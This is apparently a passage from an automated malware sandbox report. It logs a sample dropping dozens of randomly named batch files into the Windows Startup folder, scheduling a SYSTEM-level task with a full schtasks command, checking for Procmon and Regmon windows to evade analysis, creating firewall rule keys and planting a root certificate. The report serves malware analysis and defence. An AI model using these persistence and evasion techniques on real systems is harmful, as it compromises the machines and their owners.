                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gov6rjgDZRJhjjWExECEmd4R.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsh82zoYXoBpPEndu5XVvQbj.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fDdDwjmSMhosQx3rLX3Nv89G.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mttZ30v22cES8SbTv1OgQiYx.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tYY0jrXY77oGwO5gH1VTslTu.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ixTCqmFJu5C2WAuYjLa75esH.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bzhtqiaIEnooSzQ58KPkDsXr.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WfwAozSpYoRh0VfEDamYiBsR.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4lG8OjDaPfGRBHmxDRRVnuFX.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsGva5E6VHjdUQqf5f96rHfC.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2zxQMcxXAdjZW6YdcXWRkkOC.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7TQPiLaiOp4J0vvxRaQJgnEq.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8acF06oTPket8RN9OHo9AhQC.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LD4hNojEUEziyKrYgWhQk5rm.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\txcp0mnex1Rnt92zIdFfbI0y.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w7u98nz6M4xUaPLHp2FQ8cKh.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YnNYj3NsWtyv1mUxqNvcXDCG.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NF17SuJC2X4gjmjhKys98Qxu.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QiP2pWLr6NBQvOLbwQTTyn6C.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BWeUEkKv96FAORobAHCW6ypF.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OiFswMERSIM5QYpzdzXs8HqN.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wgc7DyRQRZGZ91fWhoYDAYbz.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4NTnGOUpjOPuN9Xvi5JMQBJ.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7uBTIqAI4TFaoTgWHqBwwXI.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\66nsVpLcdQEIzffvQGAD01Wx.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mzNuu3a0I49mMXBViscfANRg.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0N7wfHYhrlqZ4SvtOhtcxTC.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P8Y5HAG12fYTb8t4PcK7rKlv.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\70kdhy3RjJy5GS3eqVG34cMz.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7n1DOJlzDKyVx2HRsxGMDCQe.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\63M9nLrRjxludNRrfdaZddPt.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vD42lBWTRgzN6MsiYDmXUaxN.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LPtepEDzI9Rnp2fhv2mNTraW.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GCxOPoVfvPyhMjrPUVz65iw0.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fp4XGOFNreU9QQvFxWGD280g.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PFtTOLsGyXAF8UN7SK2yoXrT.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yx7mEUrFnFwXRMEpkyGWl1Pr.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b5QOFtze6kWQIzQsICnW3Y23.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HtVik0gCCXpMbW1ewQEIafJO.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vtoFw8ASSHe6FVnWEsT9Qpir.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JA9IiDRirqHyvko4OfQivGZ7.batJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3r3iI3aD5uoVkmnpNwglczar.batJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeWindow searched: window name: FilemonClass
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeWindow searched: window name: RegmonClass
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeWindow searched: window name: RegmonClass
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeWindow searched: window name: FilemonClass
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:30:00 /RU "SYSTEM" /TR "\"C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe\" it /fMDdidlBgf 385118 /S" /V1 /F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xInHqHgRkuPGfp5esHw9Po4t.batJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules
                  Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xInHqHgRkuPGfp5esHw9Po4t.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uM7NrUar2CHMPPLhTaEGJaiv.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9KovXimwlIyW3P77uFXo41ye.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BsDz5LTErOmd8yNfyBTmMVUZ.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WfwAozSpYoRh0VfEDamYiBsR.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4lG8OjDaPfGRBHmxDRRVnuFX.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LD4hNojEUEziyKrYgWhQk5rm.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w7u98nz6M4xUaPLHp2FQ8cKh.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QiP2pWLr6NBQvOLbwQTTyn6C.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BWeUEkKv96FAORobAHCW6ypF.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OiFswMERSIM5QYpzdzXs8HqN.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\70kdhy3RjJy5GS3eqVG34cMz.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vD42lBWTRgzN6MsiYDmXUaxN.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JA9IiDRirqHyvko4OfQivGZ7.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tEJmB2nPjyQy45rj4ea5hhl3.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsh82zoYXoBpPEndu5XVvQbj.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mttZ30v22cES8SbTv1OgQiYx.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ixTCqmFJu5C2WAuYjLa75esH.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsGva5E6VHjdUQqf5f96rHfC.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2zxQMcxXAdjZW6YdcXWRkkOC.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7TQPiLaiOp4J0vvxRaQJgnEq.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8acF06oTPket8RN9OHo9AhQC.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\txcp0mnex1Rnt92zIdFfbI0y.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YnNYj3NsWtyv1mUxqNvcXDCG.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NF17SuJC2X4gjmjhKys98Qxu.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wgc7DyRQRZGZ91fWhoYDAYbz.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4NTnGOUpjOPuN9Xvi5JMQBJ.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7uBTIqAI4TFaoTgWHqBwwXI.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\66nsVpLcdQEIzffvQGAD01Wx.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mzNuu3a0I49mMXBViscfANRg.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0N7wfHYhrlqZ4SvtOhtcxTC.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P8Y5HAG12fYTb8t4PcK7rKlv.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7n1DOJlzDKyVx2HRsxGMDCQe.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\63M9nLrRjxludNRrfdaZddPt.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LPtepEDzI9Rnp2fhv2mNTraW.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GCxOPoVfvPyhMjrPUVz65iw0.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fp4XGOFNreU9QQvFxWGD280g.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PFtTOLsGyXAF8UN7SK2yoXrT.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yx7mEUrFnFwXRMEpkyGWl1Pr.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b5QOFtze6kWQIzQsICnW3Y23.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HtVik0gCCXpMbW1ewQEIafJO.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vtoFw8ASSHe6FVnWEsT9Qpir.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3r3iI3aD5uoVkmnpNwglczar.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CpI1BxUwX4GXv0UQgqj98YFq.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dH9ICyXokcwnq5IDiow3vkKB.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1Ub2k1IJ2t5gUNZveaJnsLim.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lfz7DVXioZ89NNQKMlyzk5D1.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TH2edQjI5N96cctLqxcxRWB4.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lRYDXj1XORWa1yGwgqL1xUtR.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Gov6rjgDZRJhjjWExECEmd4R.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fDdDwjmSMhosQx3rLX3Nv89G.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tYY0jrXY77oGwO5gH1VTslTu.batJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bzhtqiaIEnooSzQ58KPkDsXr.batJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\hvfsedh:Zone.Identifier read attributes | delete
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Blob
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
